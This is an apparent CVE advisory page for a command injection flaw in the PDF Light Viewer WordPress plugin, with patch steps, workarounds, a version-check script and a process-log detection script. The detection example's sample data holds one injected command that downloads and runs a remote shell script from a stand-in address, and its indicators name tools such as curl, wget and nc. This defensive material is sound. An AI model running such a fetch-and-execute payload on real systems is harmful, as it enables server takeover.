CVE-2021-24684

CVSS v3 base score: 8.8 HIGH

📋 TL;DR

The PDF Light Viewer WordPress plugin builds a Ghostscript command line from input that an authenticated user can influence and executes it without adequate sanitisation, so a user holding the Author role can inject arbitrary operating system commands. The injected commands run as the web server account (typically www-data or apache), giving the attacker code execution on the host and a foothold for escalation or lateral movement. Any WordPress site running a plugin version before 1.4.12 with Ghostscript available is affected.

💻 Affected Systems

Products:
  • WordPress PDF Light Viewer Plugin
Versions: Versions before 1.4.12
Operating Systems: Any OS hosting WordPress with Ghostscript installed (Ghostscript is the renderer the plugin calls)
Default Config Vulnerable: ⚠️ Yes
Notes: Requires Ghostscript to be installed on the server and Author-level user access in WordPress.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the web server host: the attacker installs malware or web shells, reads application data and wp-config.php database credentials, pivots to other systems, or uses the server to stage further attacks.

🟠 Likely Case

The attacker obtains a shell running as the web server account, sufficient to deface the site, plant backdoors in the WordPress tree, or exfiltrate the database and uploaded files.

🟢 If Mitigated

With the web server account confined to least privilege and the host segmented from other systems, impact is contained to that one web server; it can still be compromised and its data exposed, but lateral movement is blocked.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires Author-level WordPress user credentials. Public proof-of-concept code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.4.12

Vendor Advisory: https://wpscan.com/vulnerability/b5295bf9-8cf6-416e-b215-074742a5fc63

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the 'PDF Light Viewer' plugin.
4. Click 'Update Now' if an update is offered.
5. If no update is offered, download version 1.4.12 or later from the WordPress plugin repository and update manually.
6. Confirm the installed version reads 1.4.12 or higher after the update.

🔧 Temporary Workarounds

Remove Ghostscript

linux

Uninstalling Ghostscript removes the binary the plugin invokes, but note two caveats: it also breaks the plugin's PDF rendering, and if the plugin hands the command line to a shell, commands injected after a metacharacter can still execute even though gs itself is missing. Treat this as a stopgap only and prefer disabling the plugin.

sudo apt-get remove ghostscript    # Debian/Ubuntu
sudo yum remove ghostscript        # RHEL/CentOS

Restrict Author Role Access

all

Author is the lowest role able to trigger this flaw. Until the update is applied, review which accounts hold Author (or higher) and demote those that do not need it to Contributor, which cannot reach the vulnerable functionality; remove dormant Author accounts outright.

🧯 If You Can't Patch

  • Disable the PDF Light Viewer plugin immediately
  • Implement network segmentation to isolate the web server from critical systems

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Installed Plugins → PDF Light Viewer version. If version is below 1.4.12, you are vulnerable.

Check Version:

wp plugin list --name='pdf-light-viewer' --field=version

Verify Fix Applied:

Confirm plugin version is 1.4.12 or higher in WordPress admin panel.
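A version check is easy to get wrong with plain string comparison ("1.4.9" sorts after "1.4.12" lexically), so the following added example, which is not part of this page or of the plugin, compares versions numerically and evaluates the JSON that `wp plugin list --format=json` emits. The embedded plugin list is constructed sample data, not output from a real site; the fixed version and plugin slug come from the advisory above.

```python
import json

FIXED_VERSION = "1.4.12"          # first fixed release per the advisory
PLUGIN_SLUG = "pdf-light-viewer"  # slug as it appears in `wp plugin list`


def parse_version(version: str) -> tuple:
    """Turn '1.4.11' (or '1.4.11-beta1') into a comparable tuple of ints.

    Trailing non-numeric suffixes are dropped and short versions are padded,
    so '1.4' compares equal to '1.4.0'.
    """
    parts = []
    for piece in version.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is strictly below the first fixed release."""
    return parse_version(installed) < parse_version(fixed)


# Constructed sample of `wp plugin list --format=json` output. The keys match
# wp-cli's default columns (name, status, update, version); the values are made up.
SAMPLE_WP_PLUGIN_LIST = json.dumps([
    {"name": "akismet", "status": "active", "update": "none", "version": "4.2.1"},
    {"name": "pdf-light-viewer", "status": "active", "update": "available", "version": "1.4.11"},
])


def assess(plugin_list_json: str, slug: str = PLUGIN_SLUG):
    """Return (installed_version, status, vulnerable) for the plugin, or None if absent."""
    for plugin in json.loads(plugin_list_json):
        if plugin.get("name") == slug:
            version = plugin.get("version", "0")
            return version, plugin.get("status"), is_vulnerable(version)
    return None


if __name__ == "__main__":
    result = assess(SAMPLE_WP_PLUGIN_LIST)
    if result is None:
        print(f"{PLUGIN_SLUG}: not installed")
    else:
        version, status, vulnerable = result
        print(f"{PLUGIN_SLUG} {version} ({status}): {'VULNERABLE' if vulnerable else 'fixed'}")
```

On a real host, feed the script the output of `wp plugin list --format=json --path=/var/www/html` (path as appropriate). An "inactive" status means the plugin's code is not loaded on normal requests, which reduces exposure, but the vulnerable files remain on disk and the plugin should still be updated or removed.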

📡 Detection & Monitoring

Log Indicators:

  • Ghostscript (gs) processes launched by the web server account whose command line contains shell metacharacters (;, |, &&, $(, backticks), or whose shell parent spawns children such as curl, wget, bash or nc
  • Requests from Author-level sessions to the plugin's endpoints carrying shell metacharacters in parameters (web server access logs show the request, not the resulting process)
  • Author accounts uploading or processing PDFs at unusual hours, or from unfamiliar source addresses

Network Indicators:

  • Outbound connections from the web server to unfamiliar hosts shortly after a gs process, typically fetching second-stage tooling
  • Persistent or beaconing connections from the web server consistent with command-and-control traffic

SIEM Query:

source="process_events" AND (process="gs" OR process="ghostscript") AND (user="www-data" OR user="apache")

This is pseudo-syntax; map the field names onto your own source. It needs process-execution telemetry (auditd execve records or an EDR feed), since web server access logs do not record spawned processes. Baseline the legitimate gs invocations the plugin makes, then alert on those whose command line contains ;, |, && or $( or whose shell parent spawns an unexpected child.
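To make the indicators above concrete, the following added example (not from this page or the plugin) runs the detection logic over a handful of constructed process-execution events. The JSON-lines shape (ts, user, cmdline) and the list of web server accounts are assumptions for the example; in practice you would map auditd EXECVE records or EDR process events onto these fields. The events, including the 198.51.100.7 address, are made up for illustration.

```python
import json
import re
from typing import Optional

# Service accounts web servers commonly run as (assumption; adjust to your platform).
WEB_USERS = {"www-data", "apache", "nginx", "httpd"}

# Ghostscript invoked as "gs" or "ghostscript", bare or with a path prefix.
GS_RE = re.compile(r"(?<![\w.-])(?:gs|ghostscript)(?![\w.-])")

# Metacharacters that chain or substitute commands. Plain redirection (e.g. 2>&1)
# is deliberately not matched, to keep noise from legitimate wrappers down.
META_RE = re.compile(r";|\|\||&&|\||`|\$\(|\n")

# Constructed process-execution events as JSON lines; nothing here was captured
# from a real system. Event 1 is the plugin's normal gs call, event 2 carries an
# injected payload, events 3 and 4 are unrelated noise.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2021-10-01T10:00:01Z", "user": "www-data",
     "cmdline": 'sh -c "gs -q -dNOPAUSE -dBATCH -sDEVICE=png16m -r72 '
                '-sOutputFile=/var/www/html/wp-content/uploads/p-%d.png '
                '/var/www/html/wp-content/uploads/2021/10/brochure.pdf"'},
    {"ts": "2021-10-01T10:02:17Z", "user": "www-data",
     "cmdline": 'sh -c "gs -q -dNOPAUSE -dBATCH -sDEVICE=png16m -r72 '
                '-sOutputFile=/var/www/html/wp-content/uploads/p-%d.png '
                '/var/www/html/wp-content/uploads/2021/10/x.pdf;'
                'curl http://198.51.100.7/s.sh|sh"'},
    {"ts": "2021-10-01T10:02:18Z", "user": "root", "cmdline": "/usr/sbin/cron -f"},
    {"ts": "2021-10-01T10:02:19Z", "user": "www-data", "cmdline": "php-fpm: pool www"},
])


def classify(event: dict) -> Optional[dict]:
    """Return a finding for a Ghostscript launch by a web server account, else None."""
    user = event.get("user", "")
    cmd = event.get("cmdline", "")
    if user not in WEB_USERS or not GS_RE.search(cmd):
        return None
    if META_RE.search(cmd):
        severity = "high"
        reason = "gs command line contains command-chaining metacharacters"
    else:
        severity = "info"
        reason = "gs launched by web server account (expected baseline for the plugin)"
    return {"ts": event.get("ts"), "user": user, "severity": severity,
            "reason": reason, "cmdline": cmd}


def scan(jsonl: str) -> list:
    """Classify every non-empty JSON line and return the findings in order."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = classify(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['ts']} [{f['severity']}] {f['user']}: {f['reason']}")
```

The "info" findings give you the plugin's normal Ghostscript baseline; only the "high" ones need paging. Pairing this with a parent/child check (a gs or sh process whose child is curl, wget or a second shell) catches payloads that avoid the metacharacters listed here.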
